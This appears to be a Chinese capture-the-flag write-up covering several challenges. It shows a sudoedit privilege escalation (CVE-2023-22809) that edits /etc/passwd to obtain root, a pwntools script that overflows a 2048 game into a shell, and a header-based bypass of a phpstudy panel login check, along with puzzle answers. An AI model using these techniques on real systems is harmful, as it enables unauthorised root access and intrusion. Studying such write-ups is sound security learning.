MISC-sudo

题目描述:小楠楠是一个热爱技术的小姑娘,最近开始学习Linux系统中的sudo命令,希望能够更好地管理系统。然而,她并不知道在使用sudo时存在着潜在的网络安全隐患,这可能会给系统带来不必要的风险。因此,她决定进一步学习有关网络安全的知识,以更好地保护系统和数据的安全。小楠楠相信,只有不断学习和提高自己的技能,才能成为一名真正的技术专家。

首先sudo -l 查看是否有能root权限执行的内容:

根据题目描述和sudoedit /etc/GAMELAB高搜了一下,怀疑考察的是CVE-2023-22809

参考:戳我戳我

xiaonannan@engine-1:/tmp$ EDITOR='nano -- /etc/passwd' sudoedit /etc/GAMELAB
(然后这里编辑/etc/passwd文件,把数字改为0,我又把初始路径改为了/root)
sudoedit: --: editing files in a writable directory is not permitted
sudoedit: /etc/GAMELAB unchanged
xiaonannan@engine-1:/tmp$ tail -1 /etc/passwd
xiaonannan:x:0:0::/root:/bin/bash

再次访问题目链接输入用户名和密码,发现可以访问/root了,flag在根目录。

MISC-盲人隐藏了起来

给了12和34.mp4。从12的原始数据分析猜测同样是一个视频文件:

用010editor打开34.mp4,高搜一下十六进制值“65 65”,把“65 65”前面的内容都粘贴在12原始数据的前面,这样就补全了12,修改后缀名为mp4,可以正常打开视频,观看视频得到字符串ChunJiSai7k7kbibi@!

利用该字符串成功解开flag.zip,得到图片flag.png,用010editor打开flag.png在尾部找到key:chunqiu123

zsteg查看flag.png在b1,bgr,lsb,xy通道得到可疑符串。

zsteg flag.png -e b1,bgr,lsb,xy得到flag:

所以key没有什么卵用^^

MISC-wordle

嗯猜真的。。

REVERSE-sum

9*9的数独矩阵,查看main()中的matrix可以得到数独目前的数字:

530070000
600195000
098000060
800060003
400803001
700020006
060000280
000419005
000080079

0就是需要填写的位置,交给chatgpt解决数独得到:

534678912
672195348
198342567
859761423
426853791
713924856
961537284
287419635
345286179

把题目中0的位置的数字单独提取出来组成字符串,运行程序提交字符串得到flag。

468912723481342575971422657913948591537428763345261

PWN-p2048

不知道,问就是不会,次数多会溢出,一顿瞎敲碰到2048就会出shell。

from pwn import *

io = remote('47.93.6.210',12723)

payload = 'ds'*500
io.sendline(payload)

io.interactive()

WEB-phpstudy

进来是小皮面板的后台登录口,因为没有加随机码所以显示404的状态。

添加请求头:X-Requested-With: XMLHttpRequest绕过随机码验证,进入后台登陆页。

然后查阅文章以为是XSS死活打不进去歇逼了,后来才知道是1day,Q Q呜呜你们怎么都会做啊